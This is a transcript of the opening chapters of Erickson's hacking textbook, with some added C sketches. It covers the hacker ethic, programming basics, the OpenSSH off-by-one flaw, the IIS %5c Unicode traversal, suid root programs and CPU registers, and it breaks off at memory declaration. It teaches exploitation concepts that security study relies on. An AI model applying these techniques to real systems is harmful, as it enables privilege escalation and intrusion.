Hacking: The Art of Exploitation (2003) Jon Erickson PDF
Summary
This book, "Hacking: The Art of Exploitation" by Jon Erickson (2003), explores the theory and science behind hacking, providing core techniques and tricks. It teaches readers how to think like a hacker, write their own hacks, or thwart system attacks, and covers topics such as buffer overflows, format strings, shellcode, and network security. The book introduces core programming and networking concepts related to hacking practices.
Full Transcript
Hacking: The Art of Exploitation by Jon Erickson
ISBN: 1593270070, No Starch Press © 2003 (241 pages)

This text introduces the spirit and theory of hacking as well as the science behind it all; it also provides some core techniques and tricks of hacking so you can think like a hacker, write your own hacks, or thwart potential system attacks.

Table of Contents
- Hacking—The Art of Exploitation
- Preface
- Chapter 1: 0x100—Introduction
- Chapter 2: 0x200—Programming
- Chapter 3: 0x300—Networking
- Chapter 4: 0x400—Cryptology
- Chapter 5: 0x500—Conclusion
- Index

Back Cover

Hacking is the art of creative problem solving, whether used to find an unconventional solution to a difficult problem or to exploit holes in sloppy programming. Many people call themselves hackers, but few have the strong technical foundation that a hacker needs to be successful. Hacking: The Art of Exploitation explains things that every real hacker should know. While many hacking books show you how to run other people's exploits without really explaining the technical details, Hacking: The Art of Exploitation introduces you to the spirit and theory of hacking as well as the science behind it all. By learning some of the core techniques and clever tricks of hacking, you will begin to understand the hacker mindset. Once you learn to think like a hacker, you can write your own hacks and innovate new techniques, or you can thwart potential attacks on your system.

In Hacking: The Art of Exploitation you will learn how to:
- Exploit programs using buffer overflows and format strings
- Write your own printable ASCII polymorphic shellcode
- Defeat non-executable stacks by returning into libc
- Redirect network traffic, conceal open ports, and hijack TCP connections
- Crack encrypted 802.11b wireless traffic using the FMS attack

If you're serious about hacking, this book is for you, no matter which side of the fence you're on.

About the Author

Jon Erickson has a formal education in computer science and speaks frequently at computer security conferences around the world. He currently works as a cryptologist and security specialist in Northern California.

Hacking—The Art of Exploitation
Jon Erickson
NO STARCH PRESS, San Francisco

HACKING. Copyright © 2003 Jon Erickson. All rights reserved. No part of this work may be reproduced or transmitted in any form or by any means, electronic or mechanical, including photocopying, recording, or by any information storage or retrieval system, without the prior written permission of the copyright owner and the publisher.

1 2 3 4 5 6 7 8 9 10 – 06 05 04 03

No Starch Press and the No Starch Press logo are registered trademarks of No Starch Press, Inc. Other product and company names mentioned herein may be the trademarks of their respective owners. Rather than use a trademark symbol with every occurrence of a trademarked name, we are using the names only in an editorial fashion and to the benefit of the trademark owner, with no intention of infringement of the trademark.

Publisher: William Pollock
Managing Editor: Karol Jurado
Cover and Interior Design: Octopod Studios
Technical Reviewer: Aaron I. Adams
Copyeditor: Kenyon Brown
Compositor: Wedobooks
Proofreaders: Stephanie Provines, Seth Benson
Indexer: Kevin Broccoli

For information on translations or book distributors, please contact No Starch Press, Inc. directly:
No Starch Press, Inc.
555 De Haro Street, Suite 250, San Francisco, CA 94107
phone: 415-863-9900; fax: 415-863-9950; [email protected]; http://www.nostarch.com

The information in this book is distributed on an "As Is" basis, without warranty. While every precaution has been taken in the preparation of this work, neither the author nor No Starch Press, Inc. shall have any liability to any person or entity with respect to any loss or damage caused or alleged to be caused directly or indirectly by the information contained in it.

Library of Congress Cataloguing-in-Publication Data
Erickson, Jon (Jon Mark), 1977-
Hacking : the art of exploitation / Jon Erickson.
p. cm.
ISBN 1-59327-007-0
1. Computer security. 2. Computer hackers. 3. Computer networks–Security measures. I. Title.
QA76.9.A25E72 2003
005.8–dc22
2003017498

ACKNOWLEDGMENTS

I would like to thank Bill Pollock, Karol Jurado, Andy Carroll, Leigh Sacks, and everyone else at No Starch Press for making this book a possibility and allowing me so much creative control of the process. Also, I would like to thank my friends Seth Benson and Aaron Adams for proofreading and editing, Jack Matheson for helping me with assembly, Dr. Seidel for keeping me interested in the science of computer science, my parents for buying that first Commodore Vic-20, and the hacker community for their innovation and creativity that produced the techniques explained in this book.

Preface

This book explains the details of various hacking techniques, many of which get very technical. While the fundamental programming concepts that these hacking techniques build from are introduced in the book, general programming knowledge will certainly aid the reader in understanding these concepts. The code examples in this book were done on an x86-based computer running Linux. Having a similarly set-up computer to follow along is encouraged; this will let you see the results for yourself and allow you to experiment and try new things. This is what hacking is all about. Gentoo Linux was the distribution used in this book, and it is available at http://www.gentoo.org.

Chapter 1: 0x100—Introduction

The idea of hacking may conjure up stylized images of electronic vandalism, espionage, dyed hair, and body piercings. Most people associate hacking with breaking the law, and therefore dub all those who engage in hacking activities criminals. Granted, there are people out there who use hacking techniques to break the law, but hacking isn't really about that. In fact, hacking is more about following the law than breaking it. The essence of hacking is finding unintended or overlooked uses for the laws and properties of a given situation and then applying them in new and inventive ways to solve a problem. The problem could be the lack of access to a computer system or figuring out a way to make old phone equipment control a model railroad system. Usually, the hacked solutions solve these problems in unique ways, unimaginable by those confined to conventional methodology.

In the late 1950s, the MIT model railroad club was given a donation of parts, most of which were old telephone equipment. The members used this equipment to rig up a complex system that allowed multiple operators to control different parts of the track by dialing into the appropriate section. They called this new and inventive use of equipment "hacking", and many consider this group to be the original hackers. They moved on to programming on punchcards and ticker tape for early computers like the IBM 704 and the TX-0.
While others were content with just writing programs that solved problems, the early hackers were obsessed with writing programs that solved problems well. A program that could achieve the same result using fewer punchcards was considered better, even though it did the same thing. The key difference was how the program achieved its results—elegance. Being able to reduce the number of punchcards needed for a program showed an artistic mastery over the computer, which was admired and appreciated by those who understood it. Analogously, a block of wood might solve the problem of supporting a vase, but a nicely crafted table built using refined techniques sure looks a lot better. The early hackers were transforming programming from an engineering task into an art form, which, like many forms of art, could only be appreciated by those who got it and would be misunderstood by those who didn't.

This approach to programming created an informal subculture, separating those who appreciated the beauty of hacking from those who were oblivious to it. This subculture was intensely focused on learning more and gaining yet higher levels of mastery over their art. They believed that information should be free, and anything that stood in the way of that freedom should be circumvented. Such obstructions included authority figures, the bureaucracy of college classes, and discrimination. In a sea of graduation-driven students, this unofficial group of hackers defied the conventional goals of getting good grades, instead pursuing knowledge itself. This drive to continuously learn and explore transcended even the conventional boundaries drawn by discrimination, evident in the group's acceptance of 12-year-old Peter Deutsch when he demonstrated his knowledge of the TX-0 and his desire to learn. Age, race, gender, appearance, academic degrees, and social status were not primary criteria for judging another's worth—this was not because of a desire for equality, but because of a desire to advance the emerging art of hacking.

The hackers found splendor and elegance in the conventionally dry sciences of math and electronics. They saw programming as a form of artistic expression, and the computer was the instrument of their art. Their desire to dissect and understand wasn't intended to demystify artistic endeavors, but was simply a way to achieve a greater appreciation of them. These knowledge-driven values would eventually be called the Hacker Ethic: the appreciation of logic as an art form, and the promotion of the free flow of information, surmounting conventional boundaries and restrictions, for the simple goal of better understanding the world. This is not new; the Pythagoreans in ancient Greece had a similar ethic and subculture, despite the lack of computers. They saw beauty in mathematics and discovered many core concepts in geometry. That thirst for knowledge and its beneficial by-products would continue on through history, from the Pythagoreans to Ada Lovelace to Alan Turing to the hackers of the MIT model railroad club. The progression of computational science would continue even further, through to Richard Stallman and Steve Wozniak. These hackers have brought us modern operating systems, programming languages, personal computers, and many other technological advances that are used every day.

So how does one distinguish between the good hackers who bring us the wonders of technological advancement and the evil hackers who steal our credit card numbers?
Once, the term cracker was coined to refer to the evil hackers and distinguish them from the good ones. The journalists were told that crackers were supposed to be the bad guys, while hackers were the good guys. The hackers stayed true to the Hacker Ethic, while crackers were only interested in breaking the law. Crackers were considered to be much less talented than the elite hackers, simply making use of hacker-written tools and scripts without understanding how they worked. Cracker was meant to be the catch-all label for anyone doing anything unscrupulous with a computer — pirating software, defacing websites, and worst of all, not understanding what they were doing. But very few people use this term today.

The term's lack of popularity might be due to a collision of definitions — the term cracker was originally used to describe those who crack software copyrights and reverse engineer copy protection schemes. Or it might simply be due to its new definition, which refers both to a group of people that engage in illegal activity with computers and to people who are relatively unskilled hackers. Few journalists feel compelled to write about an unskilled group using a term (crackers) that most people are unfamiliar with. In contrast, most people are aware of the mystery and skill associated with the term hackers. For a journalist, the decision to use the term crackers or hackers seems easy. Similarly, the term script kiddie is sometimes used to refer to crackers, but it just doesn't have the same sensational journalistic zing of the shadowy hacker. There are some who will still argue that there is a distinct line between hackers and crackers, but I believe that anyone who has the hacker spirit is a hacker, despite what laws he or she may break.

This unclear hacker versus cracker line is even further blurred by the modern laws restricting cryptography and cryptographic research. In 2001, Professor Edward Felten and his research team from Princeton University were about to publish the results of their research — a paper that discussed the weaknesses of various digital watermarking schemes. This paper was in response to a challenge issued by the Secure Digital Music Initiative (SDMI) in the SDMI Public Challenge, which encouraged the public to attempt to break these watermarking schemes. Before they could publish the paper, though, they were threatened by both the SDMI Foundation and the Recording Industry Association of America (RIAA). Apparently the Digital Millennium Copyright Act (DMCA) of 1998 makes it illegal to discuss or provide technology that might be used to bypass industry consumer controls. This same law was used against Dmitry Sklyarov, a Russian computer programmer and hacker. He had written software to circumvent overly simplistic encryption in Adobe software and presented his findings at a hacker convention in the United States. The FBI swooped in and arrested him, leading to a lengthy legal battle. Under the law, the complexity of the industry consumer controls don't matter — it would be technically illegal to reverse engineer or even discuss Pig Latin if it were used as an industry consumer control.

So who are the hackers and who are the crackers now? When laws seem to interfere with free speech, do the good guys who speak their minds suddenly become bad? I believe that the spirit of the hacker transcends governmental laws, as opposed to being defined by them. And as in any knowledgeable group, there will always be some bad people who use this knowledge to conduct bad acts.
The sciences of nuclear physics and biochemistry can be used to kill, yet they also provide us with significant scientific advancement and modern medicine. There's nothing good or bad about the knowledge itself; the morality lies in the application of that knowledge. Even if we wanted to, we couldn't suppress the knowledge of how to convert matter into energy or stop the continual technological progress of society. In the same way, the hacker spirit can never be stopped, nor can it be easily categorized or dissected. Hackers will constantly be pushing the limits, forcing us to explore further and further.

Unfortunately, there are many so-called hacker books that are nothing more than compendiums of other people's hacks. They instruct the reader to use the tools on the included CD without explaining the theory behind those tools, producing someone skilled in using other people's tools, yet incapable of understanding those tools or creating tools of their own. Perhaps the cracker and script kiddie terms aren't entirely outmoded. The real hackers are the pioneers, the ones who devise the methods and create the tools that are packed on those aforementioned CDs.

Putting legality aside and thinking logically, every exploit that a person could possibly read about in a book has a corresponding patch to defend against it. A properly patched system should be immune to this class of attack. Attackers who only use these techniques without innovation are doomed to prey only on the weak and the stupid. The real hackers can proactively find holes and weaknesses in software to create their own exploits. If they choose not to disclose these vulnerabilities to a vendor, hackers can use those exploits to wander unobstructed through fully patched and "secure" systems.

So if there aren't any patches, what can be done to prevent hackers from finding new holes in software and exploiting them? This is why security research teams exist—to try to find these holes and notify vendors before they are exploited. There is a beneficial co-evolution occurring between the hackers securing systems and those breaking into them. This competition provides us with better and stronger security, as well as more complex and sophisticated attack techniques. The introduction and progression of intrusion detection systems (IDSs) is a prime example of this co-evolutionary process. The defending hackers create IDSs to add to their arsenal, while the attacking hackers develop IDS evasion techniques, which are eventually compensated for in bigger and better IDS products. The net result of this interaction is positive, as it produces smarter people, improved security, more stable software, inventive problem-solving techniques, and even a new economy.

The intent of this book is to teach you about the true spirit of hacking. We will look at various hacker techniques, from the past through to the present, dissecting them to learn how they work and why they work. By presenting the information in this way, you will gain an understanding and appreciation for hacking that may inspire you to improve upon existing techniques or even to invent brand-new ones. I hope this book will stimulate the curious hacker nature in you and prompt you to contribute to the art of hacking in some way, regardless of which side of the fence you choose to be on.

Chapter 2: 0x200—Programming

Overview

Hacking is a term used both by those who write code and those who exploit it.
Even though these two groups of hackers have different end goals, both groups use similar problem-solving techniques. And because an understanding of programming helps those who exploit, and an understanding of exploitation helps those who program, many hackers do both. There are interesting hacks found in both the techniques used to write elegant code and the techniques used to exploit programs. Hacking is really just the act of finding a clever and counterintuitive solution to a problem.

The hacks found in program exploits usually deal with using the rules of the computer in ways never intended, to achieve seemingly magical results, which are usually focused on bypassing security. The hacks found in the writing of programs are similar, in that they also use the rules of the computer in new and inventive ways, but the final goal tends to be achieving the most impressive and best possible way to accomplish a given task. There is actually an infinite number of programs that can be written to accomplish any given task, but most of these solutions are unnecessarily large, complex, and sloppy. The few solutions that remain are small, efficient, and neat. This particular quality of a program is called elegance, and the clever and inventive solutions that tend to lead to this efficiency are called hacks. Hackers on both sides of programming tend to appreciate both the beauty of elegant code and the ingenuity of clever hacks.

Because of the sudden growth of computational power and the temporary dot-com economic bubble, less importance has been put on clever hacks and elegant code, and more importance has been placed on churning out functional code as quickly and cheaply as possible. Spending an extra five hours to create a slightly faster and more memory-efficient piece of code just doesn't make business sense when that increase in speed and memory only turns out to be a few milliseconds on modern consumer processors and less than a single percent of savings in the hundreds of millions of bytes of memory most modern computers have available. When the bottom line is money, spending time on clever hacks for optimization just doesn't make sense.

True appreciation of programming elegance is left for the hackers: computer hobbyists whose end goal isn't to make a profit, but just to squeeze every bit of functionality out of their old Commodore 64 that they possibly can; exploit writers who need to write tiny and amazing pieces of code to slip through narrow security cracks; and anyone else who appreciates the pursuit and the challenge of finding the best possible solution. These are the people who get excited about programming and really appreciate the beauty of an elegant piece of code or the ingenuity of a clever hack. Because an understanding of programming is a prerequisite to understanding how programs can be exploited, programming makes a natural starting point.

0x210 What Is Programming?

Programming is a very natural and intuitive concept. A program is nothing more than a series of statements written in a specific language. Programs are everywhere, and even the technophobes of the world use programs every day. Driving directions, cooking recipes, football plays, and DNA are all programs that exist in the lives and even the cellular makeup of people everywhere. A typical "program" for driving directions might look something like this:

1. Start out down Main Street headed east.
2. Continue on Main until you see a church on your right.
3. If the street is blocked because of construction, turn right there at 15th Street, turn left on Pine Street, and then turn right on 16th Street.
4. Otherwise, you can just continue and make a right on 16th Street.
5. Continue on 16th Street and turn left onto Destination Road.
6. Drive straight down Destination Road for 5 miles, and then the house is on the right. The address is 743 Destination Road.

Anyone who knows English can understand and follow these driving directions; they're written in English. Granted, they're not eloquent, but each instruction is clear and easy to understand, at least for someone who reads English. But a computer doesn't natively understand English; it only understands machine language. To instruct a computer to do something, the instructions must be written in its language. However, machine language is arcane and difficult to work with. Machine language consists of raw bits and bytes, and it differs from architecture to architecture. So to write a program in machine language for an Intel x86 processor, one would have to figure out the value associated with each instruction, how each instruction interacts, and a myriad of other low-level details. Programming like this is painstaking and cumbersome, and it is certainly not intuitive.

What's needed to overcome the complication of writing machine language is a translator. An assembler is one form of machine-language translator: it is a program that translates assembly language into machine-readable code. Assembly language is less cryptic than machine language, because it uses names for the different instructions and variables, instead of just using numbers. However, assembly language is still far from intuitive. The instruction names are very esoteric, and the language is still architecture-specific. This means that just as machine language for Intel x86 processors is different from machine language for Sparc processors, x86 assembly language is different from Sparc assembly language. Any program written in assembly language for one processor's architecture will not work on another processor's architecture. If a program is written in x86 assembly language, it must be rewritten to run on Sparc architecture. In addition, to write an effective program in assembly language, one must still know many low-level details of that processor's architecture.

These problems can be mitigated by yet another form of translator called a compiler. A compiler converts a high-level language into machine language. High-level languages are much more intuitive than assembly language and can be converted into many different types of machine language for different processor architectures. This means that if a program is written in a high-level language, the program only needs to be written once, and the same piece of program code can be compiled into machine language for various specific architectures. C, C++, and FORTRAN are all examples of high-level languages. A program written in a high-level language is much more readable and English-like than assembly language or machine language, but it still must follow very strict rules about how the instructions are worded, or the compiler won't be able to understand it.

Programmers have yet another form of programming language called pseudo-code. Pseudo-code is simply English arranged with a general structure similar to a high-level language. It isn't understood by compilers, assemblers, or any computers, but it is a useful way for a programmer to arrange instructions.
Pseudo-code isn't well defined. In fact, many people write pseudo-code slightly differently. It's sort of the nebulous missing link between natural languages, such as English, and high-level programming languages, such as C. The driving directions from before, converted into pseudo-code, might look something like this:

Begin going east on Main Street;
Until (there is a church on the right)
{
    Drive down Main;
}
If (street is blocked)
{
    Turn(right, 15th Street);
    Turn(left, Pine Street);
    Turn(right, 16th Street);
}
else
{
    Turn(right, 16th Street);
}
Turn(left, Destination Road);
For (5 iterations)
{
    Drive straight for 1 mile;
}
Stop at 743 Destination Road;

Each instruction is broken down into its own line, and the control logic of the directions has been broken down into control structures. Without control structures, a program would just be a series of instructions executed in sequential order. But our driving directions weren't that simple. They included statements like, "Continue on Main until you see a church on your right" and "If the street is blocked because of construction…." These are known as control structures, and they change the flow of the program's execution from a simple sequential order to a more complex and more useful flow.

In addition, the instructions to turn the car are much more complicated than just "Turn right on 16th Street." Turning the car might involve locating the correct street, slowing down, turning on the blinker, turning the steering wheel, and finally speeding back up to the speed of traffic on the new street. Because many of these actions are the same for any street, they can be put into a function. A function takes in a set of arguments as input, processes its own set of instructions based on the input, and then returns back to where it was originally called. A turning function in pseudo-code might look something like this:

Function Turn(the_direction, the_street)
{
    locate the_street;
    slow down;
    if(the_direction == right)
    {
        turn on the right blinker;
        turn the steering wheel to the right;
    }
    else
    {
        turn on the left blinker;
        turn the steering wheel to the left;
    }
    speed back up;
}

By using this function repeatedly, the car can be turned on any street, in any direction, without having to write out every little instruction each time. The important thing to remember about functions is that when they are called, the program execution actually jumps over to a different place to execute the function and then returns back to where it left off after the function finishes executing.

One final important point about functions is that each function has its own context. This means that the local variables found within each function are unique to that function. Each function has its own context, or environment, which it executes within. The core of the program is a function itself, with its own context, and as each function is called from this main function, a new context for the called function is created within the main function. If the called function calls another function, a new context for that function is created within the previous function's context, and so on. This layering of functional contexts allows each function to be somewhat atomic.

The control structures and functional concepts found in pseudo-code are also found in many different programming languages. Pseudo-code can look like anything, but the preceding pseudo-code was written to resemble the C programming language. This resemblance is useful, because C is a very common programming language.
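Since the preceding pseudo-code was written to resemble C, a brief C sketch of the same ideas may help; the function and variable names here are invented for illustration. It shows execution jumping into a function with its own local context and then returning to where it left off:

#include <stdio.h>

/* Each function has its own context: the local variable "count"
   in helper() is completely separate from the one in main(). */
void helper(void)
{
    int count = 100;  /* local to helper() */
    printf("in helper(), count = %d\n", count);
}                     /* execution returns to the caller here */

int main(void)
{
    int count = 5;    /* local to main() */
    helper();         /* execution jumps to helper(), then comes back */
    printf("back in main(), count is still %d\n", count);
    return 0;
}

When compiled and run, the second printf() still sees 5, because helper()'s context was created and destroyed without touching the local variables in main()'s context.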
In fact, the majority of Linux and other modern implementations of Unix operating systems are written in C. Because Linux is an open source operating system with easy access to compilers, assemblers, and debuggers, this makes it an excellent platform to learn from. For the purposes of this book, the assumption will be made that all operations are occurring on an x86-based processor running Linux.

0x220 Program Exploitation

Program exploitation is a staple of hacking. Programs are just a complex set of rules following a certain execution flow that ultimately tell the computer what to do. Exploiting a program is simply a clever way of getting the computer to do what you want it to do, even if the currently running program was designed to prevent that action. Because a program can really only do what it's designed to do, the security holes are actually flaws or oversights in the design of the program or the environment the program is running in. It takes a creative mind to find these holes and to write programs that compensate for them. Sometimes these holes are the product of relatively obvious programmer errors, but there are some less obvious errors that have given birth to more complex exploit techniques that can be applied in many different places.

A program can only do what it's programmed to do, to the letter of the law. Unfortunately, what's written doesn't always coincide with what the programmer intended the program to do. This principle can be explained with a joke:

A man is walking through the woods, and he finds a magic lamp on the ground. Instinctively, he picks the lamp up and rubs the side of it with his sleeve, and out pops a genie. The genie thanks the man for freeing him and offers to grant him three wishes. The man is ecstatic and knows exactly what he wants. "First", says the man, "I want a billion dollars." The genie snaps his fingers, and a briefcase full of money materializes out of thin air. The man is wide-eyed in amazement and continues, "Next, I want a Ferrari." The genie snaps his fingers, and a Ferrari appears from a puff of smoke. The man continues, "Finally, I want to be irresistible to women." The genie snaps his fingers, and the man turns into a box of chocolates.

Just as the man's final wish was granted based on what he said, rather than what he was thinking, a program will follow its instructions exactly, and the results aren't always what the programmer intends. Sometimes they can lead to catastrophic results.

Programmers are human, and sometimes what they write isn't exactly what they mean. For example, one common programming error is called an off-by-one error. As the name implies, it's an error where the programmer has miscounted by one. This happens more often than one would think, and it is best illustrated with a question: If you're building a 100-foot fence, with fence posts spaced 10 feet apart, how many fence posts do you need? The obvious answer is 10 fence posts, but this is incorrect, because 11 fence posts are actually needed. This type of off-by-one error is commonly called a fencepost error, and it occurs when a programmer mistakenly counts items instead of spaces between items, or vice versa.

Another example is when a programmer is trying to select a range of numbers or items for processing, such as items N through M. If N = 5 and M = 17, how many items are there to process? The obvious answer is M - N, or 17 - 5 = 12 items. But this is incorrect, because there are actually M - N + 1 items, for a total of 13 items.
This may seem counterintuitive at first glance, because it is, and that's exactly how these errors happen. Often these fencepost errors go unnoticed because the programs aren't tested for every single possibility, and their effects don't generally occur during normal program execution. However, when the program is fed the input that makes the effects of the error manifest, the consequences of the error can have an avalanche effect on the rest of the program logic. When properly exploited, an off-by-one error can cause a seemingly secure program to become a security vulnerability.

One recent example of this is OpenSSH, which is meant to be a secure terminal communication program suite, designed to replace insecure and unencrypted services such as telnet, rsh, and rcp. However, there was an off-by-one error in the channel allocation code that was heavily exploited. Specifically, the code included an if statement that read:

if (id < 0 || id > channels_alloc) {

It should have been:

if (id < 0 || id >= channels_alloc) {

In plain English, the code read, "If the ID is less than 0 or the ID is greater than the channels allocated, do the following stuff", when it should have been, "If the ID is less than 0 or the ID is greater than or equal to the channels allocated, do the following stuff." This simple off-by-one error allowed further exploitation of the program, so that a normal user authenticating and logging in could gain full administrative rights to the system. This type of functionality certainly wasn't what the programmers had intended for a secure program like OpenSSH, but a computer can only do what it's told, even if those instructions aren't necessarily what was intended.
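The following minimal C sketch (with invented names, not the actual OpenSSH code) shows how a bounds check with > instead of >= lets an index run exactly one element past the end of an array:

#include <stdio.h>

#define CHANNELS_ALLOC 4

int channels[CHANNELS_ALLOC];           /* valid indexes are 0 through 3 */

void use_channel(int id)
{
    if (id < 0 || id > CHANNELS_ALLOC)  /* off-by-one: should be >= */
    {
        printf("rejected id %d\n", id);
        return;
    }
    channels[id] = 1;                   /* id == 4 slips through and writes
                                           one element past the array */
    printf("wrote to channel %d\n", id);
}

int main(void)
{
    use_channel(4);                     /* accepted by the buggy check */
    return 0;
}

Here the single missing character widens the accepted range from 0 through 3 to 0 through 4, and the write to channels[4] lands in whatever memory happens to follow the array.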
Another situation that seems to breed exploitable programmer errors is when a program is quickly modified to expand its functionality. While this increase in functionality makes the program more marketable and increases its value, it also increases the program's complexity, which increases the chances of an oversight. Microsoft's IIS web server program is designed to serve up static and interactive web content to users. In order to accomplish this, the program must allow users to read, write, and execute programs and files within certain directories; however, this functionality must be limited to those certain directories. Without this limitation, users would have full control of the system, which is obviously undesirable from a security perspective. To prevent this situation, the program has path-checking code designed to prevent users from using the backslash character to traverse backward through the directory tree and enter other directories.

With the addition of support for the Unicode character set, though, the complexity of the program continued to increase. Unicode is a double-byte character set designed to provide characters for every language, including Chinese and Arabic. By using two bytes for each character instead of just one, Unicode allows for tens of thousands of possible characters, as opposed to the few hundred allowed by single-byte characters. This additional complexity meant that there were now multiple representations of the backslash character. For example, %5c in Unicode translates to the backslash character, but this translation was done after the path-checking code had run. So by using %5c instead of \, it was indeed possible to traverse directories, allowing the aforementioned security dangers. Both the Sadmind worm and the Code-Red worm used this type of Unicode conversion oversight to deface web pages.

Another related example of this letter-of-the-law principle, used outside the realm of computer programming, is known as the "LaMacchia Loophole." Just like the rules of a computer program, the U.S. legal system sometimes has rules that don't say exactly what was intended. Like a computer program exploit, these legal loopholes can be used to sidestep the intent of the law. Near the end of 1993, a 21-year-old computer hacker and student at MIT named David LaMacchia set up a bulletin board system called "Cynosure" for the purposes of software piracy. Those who had software to give would upload it, and those who didn't would download it. The service was only online for about six weeks, but it generated heavy network traffic worldwide, which eventually attracted the attention of university and federal authorities. Software companies claimed that they lost one million dollars as a result of Cynosure, and a federal grand jury charged LaMacchia with one count of conspiring with unknown persons to violate the wire-fraud statute. However, the charge was dismissed because what LaMacchia was alleged to have done wasn't criminal conduct under the Copyright Act, since the infringement was not for the purpose of commercial advantage or private financial gain. Apparently, the lawmakers had never anticipated that someone might engage in these types of activities with a motive other than personal financial gain. Later, in 1997, Congress closed this loophole with the No Electronic Theft Act. Even though this example doesn't involve the exploiting of a computer program, the judges and courts can be thought of as computers executing the program of the legal system as it was written. The abstract concepts of hacking transcend computing and can be applied to many other aspects of life involving complex systems.

0x230 Generalized Exploit Techniques

Off-by-one errors and improper Unicode expansion are both mistakes that can be hard to see at the time but are glaringly obvious to any programmer in hindsight. However, there are some common mistakes that can be exploited in ways that aren't so obvious. The impact of these mistakes on security isn't always apparent, and these security problems are found in code everywhere. Because the same type of mistake is made in many different places, generalized exploit techniques have evolved to take advantage of these mistakes, and they can be used in a variety of situations.

The two most common types of generalized exploit techniques are buffer-overflow exploits and format-string exploits. With both of these techniques, the ultimate goal is to take control of the target program's execution flow to trick it into running a piece of malicious code that can be smuggled into memory in a variety of ways. This is known as execution of arbitrary code, because the hacker can cause a program to do pretty much anything. But what really makes these types of exploits interesting are the various clever hacks that have evolved along the way to achieve the impressive final results. An understanding of these techniques is far more powerful than the end result of any single exploit, as they can be applied and extended to create a plethora of other effects. However, a prerequisite to understanding these exploit techniques is a much deeper knowledge of file permissions, variables, memory allocation, functions, and assembly language.
0x240 Multi-User File Permissions

Linux is a multi-user operating system, in which full system privileges are solely invested in an administrative user called "root." In addition to the root user, there are many other user accounts and multiple groups. Many users can belong to one group, and one user can belong to many different groups. The file permissions are based on both users and groups, so that other users can't read your files unless they are explicitly given permission. Each file is associated with a user and a group, and permissions can be given out by the owner of the file. The three permissions are read, write, and execute, and they can be turned on or off in three fields: user, group, and other. The user field specifies what the owner of the file can do (read, write, or execute), the group field specifies what users in that group can do, and the other field specifies what everyone else can do. These permissions are displayed using the letters r, w, and x, in three sequential fields corresponding to user, group, and other. In the following example, the user has read and write permissions (the first field, rw-), the group has read and execute permissions (the middle field, r-x), and other has write and execute permissions (the last field, -wx).

-rw-r-x-wx 1 guest visitors 149 Jul 15 23:59 tmp

In some situations there is a need to allow a non-privileged user to perform a system function that requires root privileges, such as changing a password. One possible solution is to give the user root privileges; however, this also gives the user complete control over the system, which is generally bad from a security perspective. Instead, the program is given the ability to run as if it were the root user, so that the system function can be carried out properly and the user isn't actually given full system control. This type of permission is called the suid (set user ID) permission or bit. When a program with the suid permission is executed by any user, that user's euid (effective user ID) is changed to the uid of the program's owner, and the program is executed. After the program execution completes, the user's euid is changed back to its original value. This bit is denoted by the s in the user field of the following file listing. There is also a sgid (set group ID) permission, which does the same thing with the effective group ID.

-rwsr-xr-x 1 root root 29592 Aug 8 13:37 /usr/bin/passwd

For example, if a user wanted to change her password, she would run /usr/bin/passwd, which is owned by root and has the suid bit on. Her euid would then be changed to root's uid (which is 0) for the execution of passwd, and it would be switched back after the execution completes. Programs that have the suid permission turned on and that are owned by the root user are typically called suid root programs.

This is where changing the flow of program execution becomes very powerful. If the flow of a suid root program can be changed to execute an injected piece of arbitrary code, then the attacker could get the program to do anything as the root user. If the attacker decides to cause a suid root program to spawn a new user shell that she can access, the attacker will have root privileges at a user level. As mentioned earlier, this is generally bad from a security perspective, as it gives the attacker full control of the system as the root user.
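A short C sketch (not from the book) makes the uid/euid distinction visible; the printed values are only illustrative:

#include <stdio.h>
#include <unistd.h>

/* Prints the real and effective user IDs. Run as a normal binary,
   both match the user who ran it; run as a suid root binary, the
   euid comes back as 0 (root) while the uid stays the same. */
int main(void)
{
    printf("uid:  %d\n", (int)getuid());
    printf("euid: %d\n", (int)geteuid());
    return 0;
}

Compiled and run normally, this might print the same number twice, say 500 and 500; after a sudo chown root and sudo chmod +s on the binary, the euid line would read 0.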
I know what you're thinking: "That sounds amazing, but how can the flow of a program be changed if a program is a strict set of rules?" Most programs are written in high-level languages, such as C, and when working at this higher level, the programmer doesn't always see the bigger picture, which involves variable memory, stack calls, execution pointers, and other low-level machine commands that aren't as apparent in the high-level language. A hacker with an understanding of the low-level machine commands that the high-level program compiles into will have a better understanding of the actual execution of the program than the high-level programmer who wrote it without that understanding. So hacking to change the execution flow of a program still isn't actually breaking any of the program rules; it's just knowing more of the rules and using them in ways never anticipated. To carry out these methods of exploitation, and to write programs to prevent these types of exploits, requires a greater understanding of the lower-level programming rules, such as program memory.

0x250 Memory

Memory might seem intimidating at first, but remember that a computer isn't magical, and at the core it's really just a giant calculator. Memory is just bytes of temporary storage space that are numbered with addresses. This memory can be accessed by its addresses, and the byte at any particular address can be read from or written to. Current Intel x86 processors use a 32-bit addressing scheme, which means there are 2^32, or 4,294,967,296, possible addresses. A program's variables are just certain places in memory that are used to store information.

Pointers are a special type of variable used to store addresses of memory locations to reference other information. Because memory cannot actually be moved, the information in it must be copied. However, it can be computationally expensive to copy large chunks of memory around to be used by different functions or in different places. This is also expensive from a memory standpoint, because a new block of memory must be allocated for the copy destination before the source can be copied. Pointers are a solution to this problem. Instead of copying the large block of memory around, a pointer variable is assigned the address of that large memory block. This small 4-byte pointer can then be passed around to the various functions that need to access the large memory block.

The processor has its own special memory, which is relatively small. These portions of memory are called registers, and there are some special registers that are used to keep track of things as a program executes. One of the most notable is the extended instruction pointer (EIP). The EIP is a pointer that holds the address of the currently executing instruction. Other 32-bit registers that are used as pointers are the extended base pointer (EBP) and the extended stack pointer (ESP). All three of these registers are important to the execution of a program and will be explained in more depth later.
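Before moving on, the pointer idea above can be made concrete with a small C sketch (the names are invented): only an address, not the block itself, is handed to the function.

#include <stdio.h>

/* The function receives only an address, not a copy of the block. */
void process_block(char *block)
{
    printf("block begins at address %p\n", (void *)block);
    printf("first byte: %c\n", block[0]);
}

int main(void)
{
    char large_block[10000];     /* a large chunk of memory */

    large_block[0] = 'A';
    process_block(large_block);  /* only the 4-byte (on x86) address is passed */
    return 0;
}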
0x251 Memory Declaration

